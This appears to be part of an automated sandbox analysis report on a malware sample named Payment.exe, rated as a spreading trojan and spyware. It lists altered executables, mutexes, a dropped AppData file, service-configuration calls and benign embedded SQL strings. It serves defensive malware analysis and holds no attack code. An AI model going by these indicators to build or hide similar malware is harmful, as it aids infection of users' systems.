                  Source: ssh-agent.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: TieringEngineService.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AgentService.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: vds.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: VSSVC.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: wbengine.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: pingsender.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: plugin-container.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: private_browsing.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: updater.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: Au3Info.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: Au3Info_x64.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AutoIt3Help.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: armsvc.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: alg.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AppVClient.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: DiagnosticsHub.StandardCollector.Service.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AutoIt3_x64.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: SciTE.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AdobeARMHelper.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jaureg.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jucheck.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jusched.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: java.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: javaw.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: javaws.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jabswitch.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: FXSSVC.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: elevation_service.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: updater.exe0.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: elevation_service.exe0.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: maintenanceservice.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: msdtc.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: java-rmi.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: java.exe0.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: javacpl.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: javaw.exe0.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: javaws.exe0.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jjs.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jp2launcher.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: keytool.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: kinit.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: klist.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: msiexec.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: PerceptionSimulationService.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: perfhost.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: Locator.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: MsSense.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: SensorDataService.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: SgrmBroker.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ktab.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: orbd.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: pack200.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: policytool.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: rmid.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: rmiregistry.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: servertool.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ssvagent.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: tnameserv.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: unpack200.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: snmptrap.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: Spectrum.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ssh-agent.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: TieringEngineService.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AgentService.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: vds.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: VSSVC.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: wbengine.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: Payment.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: jwBqGZseW.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: WBEngine.0.etl.34.drBinary string: \\?\GLOBALROOT\Device\HarddiskVolume1\(
                  Source: AdobeCollabSync.exe.8.drBinary string: @com.adobe.accp.review.v1\??\UNC\\\\Device\Mup\\Device\LanmanRedirector\\Device\WebDavRedirector\\Device\WinDfs\\Device\NetWareRedirector\\Device\nwrdr\bisLoggingEnabled
                  Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winEXE@38/170@98/24
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_02E6CBD0 StrStrIW,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,StartServiceW,8_2_02E6CBD0
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Users\user\AppData\Roaming\jwBqGZseW.exeJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5348:120:WilError_03
                  Source: C:\Users\user\Desktop\Payment.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-89ead7124fd5c239-inf
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3452:120:WilError_03
                  Source: C:\Windows\System32\AppVClient.exeMutant created: \BaseNamedObjects\Global\Multiarch.m0yv-89ead7124fd5c2399ea72c54-b
                  Source: C:\Users\user\Desktop\Payment.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-89ead7124fd5c2393d78ffaf-b
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeMutant created: \Sessions\1\BaseNamedObjects\WkfCIPWpgYCIXtifG
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4184:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7488:120:WilError_03
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Users\user\AppData\Local\Temp\tmp18CE.tmpJump to behavior
                  Source: Payment.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: Payment.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\Desktop\Payment.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: AdobeCollabSync.exe.8.drBinary or memory string: SELECT content_item_relations.src_content_item_id, branches.download_state, content_items.creation_id,branches.content_item_id,branches.record_created, branches.modified, content_items.asset_id, content_items.type, content_items.content_item_type, content_items.removed_from_server, content_items.pending_local_delete, content_item_revisions.cloud_etag, content_item_revisions.updated, content_item_revisions.local_etag, content_item_revisions.request_id, content_item_revisions.content_name, content_item_resources.resource_cloud_etag , content_item_resources.resource_local_etag , resource_revisions.rel_to_content_item , resource_revisions.resource_type, resource_revisions.committed, resource_content.resource_content, (select 1 from branches where branch_name = 'conflict' AND content_item_id = :id) as is_conflicted,(SELECT 1 FROM branches JOIN content_items ON(content_items.creation_id = branches.content_item_id) WHERE( branches.app_id = :appId AND branches.branch_name = 'current' AND branches.content_item_id = :id AND (( content_items.pending_local_delete = 1 AND content_items.removed_from_server = 0) OR branches.content_item_revision_id not in( SELECT branches.content_item_revision_id FROM branches WHERE( branches.app_id = :appId AND branches.branch_name = 'base' AND branches.content_item_id = :id))))) as is_sync_pending, (SELECT resource_content.resource_content FROM branches JOIN content_items ON (branches.content_item_id = content_items.creation_id) JOIN content_item_resources ON (branches.content_item_revision_id = content_item_resources.content_item_revision_id) JOIN resource_revisions ON (content_item_resources.resource_revision_id = resource_revisions.revision_id) JOIN resource_content ON (resource_revisions.hash = resource_content.resource_content_id) WHERE( branches.content_item_id = :id AND branches.branch_name = 'error' AND branches.app_id = :appId)) as error_payload FROM branches JOIN content_items ON (branches.content_item_id = content_items.creation_id) JOIN content_item_revisions ON (branches.content_item_revision_id = content_item_revisions.content_item_revision_id) JOIN content_item_resources ON (branches.content_item_revision
                  Source: AdobeCollabSync.exe.8.drBinary or memory string: UPDATE branches SET content_item_revision_id = :contentItemRevisionId, modified = :modified, download_state = :downloadState WHERE( content_item_id = :contentItemId AND branch_name = :branchName AND app_id = :appId);
                  Source: AdobeCollabSync.exe.8.drBinary or memory string: CREATE TABLE IF NOT EXISTS resource_content ( resource_content_id TEXT PRIMARY KEY NOT NULL, resource_content TEXT NOT NULL);
                  Source: AdobeCollabSync.exe.8.drBinary or memory string: INSERT INTO content_items( creation_id, asset_id, type, content_item_type, created, removed_from_server, pending_local_delete) VALUES( :creationId, :assetId, :type, :contentItemType, :created, :removedFromServer, :pendingLocalDelete);
                  Source: AdobeCollabSync.exe.8.drBinary or memory string: SELECT pending_request_id, request_type, content_item_id, context, pending_request_created, request_status, message, status_code, device_mapping_id FROM pending_requests WHERE( request_type = :requestType);
                  Source: AdobeCollabSync.exe.8.drBinary or memory string: INSERT OR REPLACE INTO branches( content_item_id, content_item_revision_id, branch_name, app_id, is_transient, record_created, modified, download_state) VALUES( :contentItemId, :contentItemRevisionId, :branchName, :appId, :isTransient, :recordCreated, :modified, :downloadState);
                  Source: AdobeCollabSync.exe.8.drBinary or memory string: UPDATE content_items SET pending_local_delete = :pendingLocalDelete WHERE( creation_id = :creationId);
                  Source: AdobeCollabSync.exe.8.drBinary or memory string: INSERT OR REPLACE INTO content_item_relations( src_content_item_id, target_content_item_id, rel) VALUES( :srcContentItemId, :targetContentItemId, :rel);
                  Source: AdobeCollabSync.exe.8.drBinary or memory string: INSERT INTO resource_revisions( revision_id, rel_to_content_item, resource_type, media_type, locator, committed, hashType, hash, storageSize, width, height) VALUES( :revisionId, :relToContentItem, :resourceType, :mediaType, :locator_var, :committed_var, :hashType_var, :hash_var, :storageSize_var, :width_var, :height_var);
                  Source: AdobeCollabSync.exe.8.drBinary or memory string: CREATE TABLE IF NOT EXISTS branches ( content_item_id TEXT NOT NULL, content_item_revision_id TEXT NOT NULL, branch_name TEXT NOT NULL, app_id TEXT NOT NULL, is_transient INTEGER DEFAULT 0 NOT NULL, record_created TIMESTAMP NOT NULL, modified TIMESTAMP NOT NULL, download_state TEXT DEFAULT NULL, PRIMARY KEY (content_item_id, branch_name, app_id));
                  Source: AdobeCollabSync.exe.8.drBinary or memory string: CREATE TABLE IF NOT EXISTS content_item_resources ( content_item_revision_id TEXT NOT NULL, resource_revision_id TEXT NOT NULL, resource_id TEXT DEFAULT NULL, resource_cloud_etag TEXT DEFAULT NULL, resource_cloud_version_id TEXT DEFAULT NULL, resource_local_etag TEXT DEFAULT NULL, resource_local_version_id TEXT DEFAULT NULL, PRIMARY KEY (content_item_revision_id, resource_revision_id));
                  Source: AdobeCollabSync.exe.8.drBinary or memory string: INSERT INTO device_mappings( device_mapping_id, content_item_id, collection_id, content_item_type, include_rel_types, include_depth, branch, TTL, Priority, app_info) VALUES( :deviceMappingId, :contentItemId, :collectionId, :contentItemType, :includeRelTypes, :includeDepth, :branch, :TTL, :priority, :appInfo);
                  Source: AdobeCollabSync.exe.8.drBinary or memory string: INSERT INTO content_item_resources( content_item_revision_id, resource_revision_id) VALUES( :contentItemRevisionId, :resourceRevisionId);
                  Source: AdobeCollabSync.exe.8.drBinary or memory string: INSERT INTO branches ( content_item_id, content_item_revision_id, branch_name, app_id, is_transient, record_created, modified, download_state) VALUES( :contentItemId, :contentItemRevisionId, :branchName, :appId, :isTransient, :recordCreated, :modified, :downloadState);
                  Source: AdobeCollabSync.exe.8.drBinary or memory string: UPDATE content_items SET removed_from_server = :removedFromServer WHERE( creation_id = :creationId);
                  Source: AdobeCollabSync.exe.8.drBinary or memory string: UPDATE branches SET modified = :modified WHERE( content_item_id = :contentItemId AND branch_name = :branchName AND app_id = :appId);
                  Source: AdobeCollabSync.exe.8.drBinary or memory string: SELECT branches.content_item_id FROM branches JOIN content_items ON(content_items.creation_id = branches.content_item_id) WHERE( branches.app_id = :appId AND branches.branch_name = :branch1 AND branches.content_item_id = :contentItemId AND (( content_items.pending_local_delete = 1 AND content_items.removed_from_server = 0) OR branches.content_item_revision_id not in( SELECT branches.content_item_revision_id FROM branches WHERE( branches.app_id = :appId AND branches.branch_name = :branch2 AND branches.content_item_id = :contentItemId))));
                  Source: AdobeCollabSync.exe.8.drBinary or memory string: CREATE TABLE IF NOT EXISTS resource_revisions ( revision_id TEXT PRIMARY KEY NOT NULL, rel_to_content_item TEXT NOT NULL, resource_type TEXT NOT NULL, media_type TEXT NOT NULL, locator TEXT NOT NULL, committed INTEGER NOT NULL, hashType TEXT DEFAULT NULL, hash TEXT DEFAULT NULL, storageSize INTEGER DEFAULT 0, width INTEGER DEFAULT 0, height INTEGER DEFAULT 0);
                  Source: AdobeCollabSync.exe.8.drBinary or memory string: select count(*) from SQLITE_MASTER where type = "table";
                  Source: AdobeCollabSync.exe.8.drBinary or memory string: UPDATE content_items SET pending_local_delete = :pendingLocalDelete WHERE( creation_id = :creationId);
                  Source: AdobeCollabSync.exe.8.drBinary or memory string: INSERT INTO content_item_revisions( content_item_revision_id, cloud_etag, updated, local_etag, request_id, content_name) VALUES( :contentIemRevisionId, :cloudEtag, :updated, :localEtag, :requestId, :contentName);
                  Source: AdobeCollabSync.exe.8.drBinary or memory string: CREATE TABLE IF NOT EXISTS content_item_revisions( content_item_revision_id TEXT PRIMARY KEY NOT NULL, cloud_etag TEXT DEFAULT NULL, cloud_version_id TEXT DEFAULT NULL, updated TIMESTAMP DEFAULT NULL, acl TEXT DEFAULT NULL, local_etag TEXT DEFAULT NULL, local_version_id TEXT DEFAULT NULL, request_id TEXT DEFAULT NULL, content_name TEXT DEFAULT NULL);
                  Source: AdobeCollabSync.exe.8.drBinary or memory string: CREATE TABLE IF NOT EXISTS content_items( creation_id TEXT PRIMARY KEY NOT NULL, asset_id TEXT DEFAULT NULL, type TEXT NOT NULL, content_item_type TEXT NOT NULL, created TEXT NOT NULL, removed_from_server INTEGER DEFAULT 0 NOT NULL, pending_local_delete INTEGER DEFAULT 0 NOT NULL, update_seq_num INTEGER DEFAULT 0 NOT NULL);
                  Source: AdobeCollabSync.exe.8.drBinary or memory string: CREATE TABLE IF NOT EXISTS sync_tokens ( content_item_id TEXT PRIMARY KEY NOT NULL, token TEXT DEFAULT NULL, last_sync_time TIMESTAMP DEFAULT NULL, device_mapping_id TEXT DEFAULT NULL);
